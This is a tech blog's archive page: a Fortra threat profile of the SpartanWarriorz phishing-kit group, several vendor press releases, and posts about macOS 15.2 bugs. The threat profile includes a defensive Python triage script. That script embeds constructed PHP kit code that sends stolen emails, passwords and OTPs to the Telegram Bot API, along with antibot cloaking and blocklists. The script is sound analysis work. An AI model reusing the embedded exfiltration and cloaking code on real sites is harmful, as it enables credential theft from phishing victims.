Archive for December, 2024

Guest Post: Threat Actor Profile/Phish Kit Analysis By Fortra

Posted in Commentary with tags on December 13, 2024 by itnerd

SpartanWarriorz

Threat Background & History

Fortra is tracking activity from a scam kit authoring group known as SpartanWarriorz. These authors have been selling kits targeting over 300 global brands as far back as September 2022. They have targeted industries including financial institutions in North America and Europe, retail, delivery services, and social media platforms. Using the messaging service Telegram, they have been observed giving away a plethora of free phishing kits to increase their reputation within the phishing community. 

Operations experienced some service disruption recently when the SpartanWarriorz Telegram channel was shut down on November 21st. The group created a new channel on the same day and has attempted to inform their past subscribers.

Profile picture for SpartanWarriorz on Telegram.

Service Breakdown

SpartanWarriorz has primarily used the messaging platform Telegram to advertise their phishing kits. Their Telegram channel currently has over 5,300 subscribers and is managed by two moderators. Across their platform they have offered services including:

  • Phishing Kits and Pages
  • Access to Compromised Websites
  • Published Phishing Lures
  • Email Spamming Services

Example phishing kit advertised by SpartanWarriorz on Telegram.

Customary advertising file within a SpartanWarriorz phish kit.

SpartanWarriorz has advertised over 300 kits on Telegram that are available for sale or have been given away. In addition to the kits offered, SpartanWarriorz advertises mailer tools that allow threat actors to send out phishing campaigns using pre-authored lure emails available from the seller. The group also offers access to web server shells through their Telegram platform. These shells have been installed on compromised servers and can be used to carry out phishing attacks. 

A Telegram post advertising a plethora of SpartanWarriorz phish kits.

SpartanWarriorz kits allow users to input a Telegram API token and chat ID to exfiltrate stolen credentials, including OTP codes. Additionally, kits include extensive antibot lists that block specific IP addresses and ranges, user agents, and known web crawlers from accessing the phishing pages within the kit. The antibot code sends all blocked visitors to Google.com or a fake 404 error page. Other configuration settings frequently seen include options to require victims to sign in twice or complete a CAPTCHA.
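As an added illustration of how a defender might triage a recovered kit for the Telegram exfiltration, antibot list and cloaking behaviour described above (example code written for this post, not from Fortra or the kit authors; the file contents are constructed stand-ins, and the token, chat ID and IP prefixes are placeholders):

```python
import re
from dataclasses import dataclass, field

# Constructed stand-ins for files recovered from a credential-phishing kit.
# Nothing here is copied from a real kit; the token and chat ID are placeholders.
SAMPLE_KIT = {
    "send.php": (
        "<?php\n"
        "$token = '1234567890:AAExampleConstructedTokenValue00000000';\n"
        "$chat_id = '987654321';\n"
        "$msg = 'User: '.$_POST['email'].' Pass: '.$_POST['pass'].' OTP: '.$_POST['otp'];\n"
        "file_get_contents('https://api.telegram.org/bot'.$token.'/sendMessage?chat_id='.$chat_id.'&text='.urlencode($msg));\n"
        "header('Location: https://www.google.com/');\n"
    ),
    "antibot.php": (
        "<?php\n"
        "$blocked_ua = array('googlebot', 'bingbot', 'phishtank', 'curl', 'python-requests');\n"
        "$blocked_ip = array('64.233.', '66.249.', '207.46.');\n"
        "foreach ($blocked_ua as $ua) {\n"
        "  if (stripos($_SERVER['HTTP_USER_AGENT'], $ua) !== false) { header('HTTP/1.0 404 Not Found'); exit; }\n"
        "}\n"
    ),
    "index.html": "<html><body><form action='send.php' method='post'></form></body></html>\n",
}

# Telegram bot tokens have the shape <numeric bot id>:<opaque secret>.
TOKEN_RE = re.compile(r"\b(\d{6,}):([A-Za-z0-9_-]{25,})")
CHAT_ID_RE = re.compile(r"chat_?id['\"]?\s*=\s*['\"]?(\d{5,})", re.I)
IP_PREFIX_RE = re.compile(r"['\"](?:\d{1,3}\.){1,3}\d{0,3}['\"]")
# Crawler and tool names commonly seen in kit antibot lists (assumed list).
CRAWLER_NAMES = ("googlebot", "bingbot", "yandex", "phishtank", "virustotal",
                 "netcraft", "curl", "wget", "python-requests")


@dataclass
class KitFindings:
    telegram_exfil: list = field(default_factory=list)  # (file, masked token, chat id)
    antibot_files: list = field(default_factory=list)   # (file, crawler names listed)
    ip_blocklist_files: list = field(default_factory=list)
    cloaking_files: list = field(default_factory=list)  # redirect or fake 404 for blocked visitors
    otp_capture: bool = False


def mask_token(token: str) -> str:
    """Keep only enough of the secret to correlate across kits; never log it whole."""
    return token[:4] + "..." + token[-4:]


def triage_kit(files: dict) -> KitFindings:
    """Scan a mapping of filename -> source text for the kit behaviours described above."""
    found = KitFindings()
    for name, src in files.items():
        low = src.lower()
        if "api.telegram.org" in low:  # Telegram Bot API used as the exfil channel
            chat = CHAT_ID_RE.search(src)
            for m in TOKEN_RE.finditer(src):
                masked = f"{m.group(1)}:{mask_token(m.group(2))}"
                found.telegram_exfil.append((name, masked, chat.group(1) if chat else None))
        crawlers = sorted(c for c in CRAWLER_NAMES if c in low)
        if len(crawlers) >= 2:  # two or more crawler names strongly suggests a UA blocklist
            found.antibot_files.append((name, crawlers))
        if len(IP_PREFIX_RE.findall(src)) >= 3:  # quoted dotted prefixes: IP range blocklist
            found.ip_blocklist_files.append(name)
        if ("location:" in low and "google.com" in low) or "404 not found" in low:
            found.cloaking_files.append(name)
        if re.search(r"\$_(post|request)\[['\"]otp", low):
            found.otp_capture = True
    return found


if __name__ == "__main__":
    print(triage_kit(SAMPLE_KIT))
```

The masked token and chat ID are enough to cluster kits that share an exfil channel and to request takedown of the bot without redistributing a live secret.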

Red Canary Delivers Record Q3 Results

Posted in Commentary with tags on December 12, 2024 by itnerd

 Red Canary, a leader in managed detection and response (MDR), announced strong Q3 FY25 results, achieving positive operating margins for the first time in company history. These results were buoyed by strength in the enterprise customer segment, with the most recent quarter exceeding 50% growth year-over-year. As identity and cloud threats continue to rise, organizations in nearly every industry are turning to Red Canary for its world class detection and response capabilities across endpoint, identity, and cloud attack surfaces.

With advanced detection engineering, threat intelligence, threat hunting, and world-class support baked into the platform, Red Canary helps customers improve their security posture from day one, providing immediate time to value. Over the last year, growth has been driven by large organizations realizing the value of Red Canary’s expertise in detecting and responding to emerging threats across all domains with high quality, accuracy, and at an incredible scale.

Product innovations in Q3 FY25:

  • Continued to accelerate threat investigations and response times with GenAI agent flows, realizing over 60% faster mean time to investigate and enabling customers to address threats more swiftly and effectively with Red Canary flow investigations.
  • Cost-efficient storage that strengthens security posture with the release of Security Data Lake, delivering long-term log retention, search, and MDR enhancement capabilities. 
  • Expanded endpoint integrations with Trend Micro Vision One integration, providing customers an EDR solution with extensive telemetry, a comprehensive detection analytics library, automated remediation actions, and advanced threat hunting.
  • Delivered powerful AI-driven security operations with Managed XSIAM, making Red Canary analytics and expert help available inside of Palo Alto Networks Cortex XSIAM with a new managed service—now in early access.

Key company milestones in Q3 FY25:

  • Achieved record-breaking third quarter, the best Q3 in the company’s history for new business bookings.
  • Appointed Todd Chronert as Chief Revenue Officer, a proven cybersecurity leader with nearly 20 years of experience, to drive global sales, business development, and partnerships while accelerating growth and strengthening Red Canary’s leadership in MDR.
  • Published a major midyear update to the 2024 Threat Detection Report, offering a comprehensive summary and analysis on the top trending threats and techniques in the first half of 2024 to help provide timely insights for organizations to stay ahead of emerging threats.
  • Released the latest monthly threat intelligence research, highlighting that browser-related threats, including ChromeLoader and SocGholish, continue to have an impact and rank among the top 10 threats.
  • Earned customer recognition with five badges in G2’s Fall 2024 report, including Fastest Implementation in MDR.

So My macOS 15.2 Issue With The TV Connected To My Mac mini Showing As Being Mirrored Is A “Feature”

Posted in Commentary with tags on December 12, 2024 by itnerd

Earlier today I posted a story about my Mac mini thinking that the Screen is being mirrored when it actually wasn’t. I did a lot of research and I think I found my answer here. This is the key bit:

In the current version of macOS, Apple allows for mirroring a Mac’s display to an ‌Apple TV‌, but there is no option for sharing just a portion of a display.

The menu allowing for an entire screen or just a window or app to be displayed also appears when connecting a Mac to a TV over HDMI.

That last sentence is the one that fits what I am seeing and confirms that this is a “feature” and not a bug as this is a TV that my Mac mini is connected to and it is connected over HDMI. But having that purple icon always on my screen seems to me to be completely needless. Thus to stop my OCD from acting up, I’ve hidden the icon by doing this:

  • Go to System Settings
  • Go to Control Center
  • Set Screen Mirroring to Don’t Show In Menu Bar

It should look like this when you’re done:

I honestly wish Apple found some more elegant method of doing this. I say that because I am sure that the AppleCare helpline is being hit with calls regarding this, which is something that could have been avoided by a better UI design. But what do I know? After all Apple knows best right?

AHEAD Launches Mid-Market Growth Unit to Empower Digital Transformation

Posted in Commentary with tags on December 12, 2024 by itnerd

AHEAD, a leading provider of enterprise cloud solutions, has announced the formation of a dedicated unit to serve the mid-market segment, defined generally as organizations with under 2,500 employees and less than $1 billion in annual revenues. This new AHEAD unit will include a dedicated sales team and solutions engineering support model tailored to the specific needs of mid-market organizations.

With over 2,000 clients already in this segment, AHEAD sees potential for 30% annual growth from both expansion of existing client relationships and acquiring new accounts.  Further, the segment is a key priority of AHEAD’s largest partner, Dell Technologies, whose solutions will be a major point of emphasis in serving the segment.

Sales veteran Mike Kuehn will oversee the mid-market team as Senior Vice President, reporting to Tim Frank, AHEAD’s Chief Revenue Officer. Based in New Jersey, Mike brings 30 years of experience in B2B technology, and a track record of building high-growth software and services companies. In addition to his responsibilities for the mid-market, Kuehn will also lead AHEAD Sales University (ASU), the company’s sales professional development program designed to create the next generation of seasoned account executives. 

Lloyd’s of London Launches First-of-its-kind Consortium Built on HITRUST Certification to Shape the Future of Cyber Insurance  

Posted in Commentary with tags on December 12, 2024 by itnerd

HITRUST, the leader in information security assurances for risk and compliance management, today unveiled an innovative cyber insurance consortium in collaboration with Lloyd’s of London and backed by a network of globally recognized AA-rated insurers. This first-of-its-kind shared risk facility revolutionizes the cyber insurance landscape, delivering exclusive, market-leading coverage and rates to HITRUST-certified organizations worldwide. By aligning relevant and reliable cybersecurity practices with tailored insurance solutions, the consortium sets a new standard for incentivizing and protecting trusted organizations.

As cyber threats continue to escalate, organizations face increasing pressure to effectively measure and mitigate information risk. HITRUST’s proven methodology stands out as the industry-leading solution to manage information risk and to measure residual risk. By incorporating relevant risk management practices and security controls with a comprehensive and reliable assurance process, HITRUST-certified organizations achieve a significantly lower likelihood of breaches with the gold standard for resilience in an increasingly volatile threat landscape and endorsement by leading cyber insurers.

According to the recently published 2024 Trust Report, less than 1% of HITRUST certifications experienced a breach over the past two years. This remarkable statistic underscores the effectiveness of the HITRUST assurance program in delivering measurable risk mitigation outcomes.

The newly formed consortium with Lloyd’s of London unites additional capital from a global network of Moody’s recognized AA-rated insurers to establish an innovative shared risk facility. This novel initiative leverages the proven link between HITRUST certification and superior and measurable risk management, enabling insurers to confidently deliver enhanced and more consistent insurance products. The facility is designed to scale as additional insurers join, ensuring greater capacity to meet the evolving demands of HITRUST-certified organizations across the globe.

Key benefits for HITRUST-certified organizations include:

  • Lower Insurance Costs: Exclusive, market-leading rates with more favorable terms and significant savings that reflect an organization’s commitment to strong cybersecurity practices, including a starting credit of 25% on premiums.  
  • Simplified Insurance Process: Redundant questionnaires and lengthy application cycles are replaced with streamlined underwriting based on data from the HITRUST certification; some policies being underwritten in just one week.
  • Comprehensive Coverage: Policies are built on a single-page exclusion model, offering clarity and adaptability while supporting a wide range of organizational needs.
  • Scalable Protection: Access to increasing capacity as the consortium grows, ensuring coverage is adaptable to an organization’s needs as they change and grow over time.
  • Recognition for Security Investments: Demonstrate to partners, clients, and regulators that your organization meets the highest standards of cybersecurity, validated by the industry’s most trusted risk management framework.

To enable this consortium, HITRUST has developed a secure API that allows insurers to access detailed information about an organization’s HITRUST r2 certification through the company’s Results Distribution System (RDS). This technology ensures that insurers receive structured, consistent assessment data, facilitating a more accurate and efficient underwriting process.

Understanding the Shared Risk Facility  

A shared risk facility is a collaborative arrangement where multiple insurers come together to share the underwriting risk associated with policies. For HITRUST-certified organizations, this means access to better insurance options, as the insurers collectively recognize the reduced risk these organizations present. This collaboration fosters a more stable and competitive insurance market.

Availability and Next Steps

The enhanced cyber insurance offerings are available to HITRUST-certified organizations effective immediately through their existing brokers. Currently available for HITRUST r2 certifications, plans are underway to extend this capability to include the i1 and e1 assurance programs in 2025. Additionally, there is potential to expand the scope to encompass HITRUST’s newly released AI Security Certification offering.

Organizations interested in benefiting from improved coverage and rates are encouraged to pursue HITRUST certification to take advantage of these new options.

For more information about how to get started with HITRUST certification, please visit hitrustalliance.net/cyber-insurance or contact them.

macOS 15.2 Is Making My Mac mini Think That The Screen Is Being Mirrored… Why?

Posted in Commentary with tags on December 12, 2024 by itnerd

Adding to Time Machine issues, and display issues which appear to be a design choice that Apple didn’t tell anyone about, along with “Hey Siri” Functionality On The Mac Mini Apparently Not Working comes a new issue that appeared when I installed macOS 15.2 which dropped yesterday. After the install of that update, my Mac mini which is plugged into a TV now shows this:

The purple icon on the left indicates that my screen is being shared. This is further confirmed by this:

But the thing is that I am not mirroring the screen. The Mac mini is only plugged into a TV via HDMI. There are no secondary monitors in play here as confirmed by this:

Pressing “Stop Extending” doesn’t do anything. I am not running any third party software to do anything with monitors. My only thought is that the Mac mini is seeing this display as a TV, which it is, and for reasons that I do not understand is offering to extend to this TV even though it is the only display connected.

Now I initially thought it was just me. But it turns out that there’s a Reddit post that has other people with the same issue. That implies a bug unless there is evidence that says otherwise. Thus I will continue to research this and post any new findings that I come across here in the form of updates. But I wanted to put this out there in case that you had the same issue. Also, if you know what this is and why it’s happening, along with any fixes if this is a bug, I’d love to hear from you as well.

I swear, macOS Sequoia is not a good release at all. Apple may have been better off letting it bake in the oven a bit longer before releasing it to the public.

Zoho Introduces a Suite of New Features to Help Canadian Businesses Unlock Greater Efficiency in Their Finance and Operations

Posted in Commentary with tags on December 12, 2024 by itnerd

Zoho today announced the addition of key capabilities in Zoho Books, Zoho Inventory, and Zoho Practice, helping Canadian businesses and accountants enhance operational efficiency, simplify routine financial tasks, and ensure regulatory compliance. These capabilities aim to support organizations in streamlining many of their internal processes by providing them with necessary tools that help them grow. 

Many businesses rely on manual processes for performing critical financial tasks, resulting in delays, errors, and inefficiencies that drive up costs and hinder growth. Today’s updates to Zoho’s finance and operations platform aim to streamline these processes for greater efficiency for both businesses and accountants.

For businesses:

Zoho Books has introduced a suite of new features, including support for electronic filing of T4A and T5018 slips with Canada Revenue Agency. Businesses from Quebec can generate combined GST/HST-QST returns that include both federal and provincial returns that can be easily filed online with the Revenu Quebec. Progress-based invoicing allows businesses to invoice customers for the duration of a project incrementally, improving cash flow. With bill pay capabilities, businesses can autoscan, 3-way match for accuracy, and pay multiple bills from different vendors, simplifying the entire accounts payable process. Advanced features like revenue recognition automatically recognize revenue based on contractual obligations or when the service is delivered, while the fixed asset management feature allows recording of asset details, automatic depreciation calculations, and generate forecast reports, simplifying the bookkeeping process.

In Zoho Inventory, advanced warehouse management capabilities—such as enhanced location tracking and labeling, stock counting, stock out alerts, and role-based access to the warehouse operations—offer better inventory control, ensure accurate stock levels, and provide faster order processing. The product’s mobile apps empower warehouse employees to perform their tasks more efficiently, improving productivity.

For accountants:

Zoho Practice has included new features to help accountants deliver client services efficiently. Workpapers simplifies audit and compliance workflows by automatically fetching client financial statements from Zoho Books, enabling easy comparison, adjustments, document management, and collaboration for seamless review and approval. The self-service portal enables accountants to collaborate with clients that use third-party services, facilitating document requests, digital signatures, and communication. Accountants can easily create and manage ledgers without a full accounting system, helping them maintain a single source truth. Advanced capabilities like workflow automation, custom functions, and scheduling options support a complete tailoring of their operational workflow.

Pricing and Availability

All the features announced today for Zoho Books, Zoho Inventory, and Zoho Practice are available for immediate use. For more details on pricing, please visit the following pages for each product: Zoho Books, Zoho Inventory, Zoho Practice.

Free Wi-Fi Pilot Project Launches in Two Ottawa Community Housing Buildings

Posted in Commentary with tags on December 12, 2024 by itnerd

Ottawa Community Housing (OCH) is excited to announce that a free community Wi-Fi pilot has officially launched at two of its buildings in Vanier. Known as CommuniFi, the project is managed by National Capital FreeNet (NCF) in partnership with OCH, Hiboo Networks and with funding and technical support from CIRA (Canadian Internet Registration Authority).

The CommuniFi project helps bridge the digital divide for tenants at 251 and 255 Donald Street by providing free Wi-Fi in the common areas of the buildings. For many low-income households, the high cost of home internet and cellphone data creates barriers to accessing essential resources like education, employment opportunities, health services and connection to friends and family. This initiative is designed to alleviate some of the financial pressures associated with network connection and empower tenants to better navigate the digital world.

The introduction of free Wi-Fi transforms the common areas of the buildings into a hub for learning, support and social engagement. It creates opportunities to host essential onsite support programs, social activities and community events. Community partners can also leverage the free Wi-Fi to deliver events, programs and workshops, providing tenants with access to a variety of resources and opportunities within their buildings. 

Recognizing that digital access also requires digital skills, NCF’s award-winning HelpDesk will host tailored workshops and information sessions to assist tenants in using the free Wi-Fi network. The workshops aim to equip tenants with the knowledge to fully benefit from the opportunities that the connectivity provides. 

OCH is proud to play a key role in expanding digital access beyond these buildings. By hosting the necessary infrastructure, OCH is enabling NCF to extend the pilot project to at least 10 other community organizations in the coming year, strengthening digital inclusion and building more connected communities. 

Bell and Palo Alto Networks Form Strategic Partnership 

Posted in Commentary with tags on December 12, 2024 by itnerd

Bell Canada, Canada’s largest communications company, and Palo Alto Networks, the global cybersecurity leader, announced today a strategic partnership that brings together Bell’s expertise in Managed and Professional services with Palo Alto Networks’ industry-leading, AI-powered cybersecurity platforms. Building upon customer success and service development initiatives launched in 2023, Bell will now offer a full suite of services across Palo Alto Networks’ three platforms, delivering comprehensive protection against evolving cyber threats for customers in Canada.

Palo Alto Networks’ platformization approach unifies diverse security solutions into scalable platforms across network, cloud, and security operations. These platforms leverage automation and AI to deliver robust protection against cyber threats. Bell’s deep bench of Managed and Professional Services experts, combined with Palo Alto Networks’ platforms, enables 24/7 protection and secure connectivity through dedicated threat alerts and mitigation to stop and prevent malicious attacks. Businesses are empowered to achieve a unified security posture, enhance threat prevention, optimize operational efficiency, and accelerate digital transformation initiatives.

Bell’s Managed Services team will support the following Palo Alto Networks solutions:

  • Prisma Access – The industry’s only security services edge (SSE) solution offering the most cutting-edge Zero Trust Network Access, (ZTNA 2.0), to protect the future of work with an easy-to-use, unified security product. Prisma Access delivers industry-leading security to dramatically reduce the risk of a data breach while offering an exceptional user experience.
  • Palo Alto Networks NGFW – The first Next-Generation Firewalls with real-time inline security that help stop the most complex threats with AI-powered, cloud-based network security.
  • Prisma Cloud (CNAPP) – The Code to Cloud platform powered by Precision AI secures cloud-native applications and infrastructure, accelerating cloud adoption and helping to ensure security policy compliance.
  • Cortex XSIAM – The leading AI-powered SOC platform that centralizes data and SOC capabilities (XDR, SOAR, ASM, SIEM) to streamline security operations and accelerate and automate incident response and remediation.

The partnership underscores Bell’s objective to provide innovative and comprehensive security solutions to businesses across Canada. Earlier this year, Bell announced the acquisition of Stratejm, a leading provider of Security-as-a-Service and enhanced Managed Detection and Response services. The expanded partnership with Palo Alto Networks further augments Bell’s cybersecurity capabilities and is another step toward becoming the largest and most trusted Managed Security Services Provider in Canada.

Why Is “Hey Siri” Functionality On The Mac Mini Apparently Not Working?

Posted in Commentary with tags on December 12, 2024 by itnerd

A reader of this blog pointed me towards a Reddit thread and a MacRumors thread where people are complaining about this:

Given that Apple Intelligence and a better Siri experience are part and parcel of macOS Sequoia, and the Mac mini is Apple’s gateway into getting more Macs into the hands of more people, this is really bad.

Another data point. The same reader who tipped me off to this has confirmed that on his M4 Mac mini, when Apple Intelligence is on, he has to click on the Siri/Apple Intelligence button, then the mic icon, and then he can talk to Siri. If Apple Intelligence is off, he clicks Siri and he can talk right away. That implies a bug to me.

What I am guessing is that Apple likely only tested this on the Studio Display and figured that it was job done at that point. I say that because some people with Mac minis and Studio Displays have confirmed that this is working as intended. Clearly Apple needs to do better QA before releasing stuff to their customers. The bottom line is that you can add this to the growing list of bugs with macOS Sequoia, which includes Time Machine issues, and display issues which appear to be a design choice that Apple didn’t tell anyone about.

Apple really has lost the plot when it comes to software quality.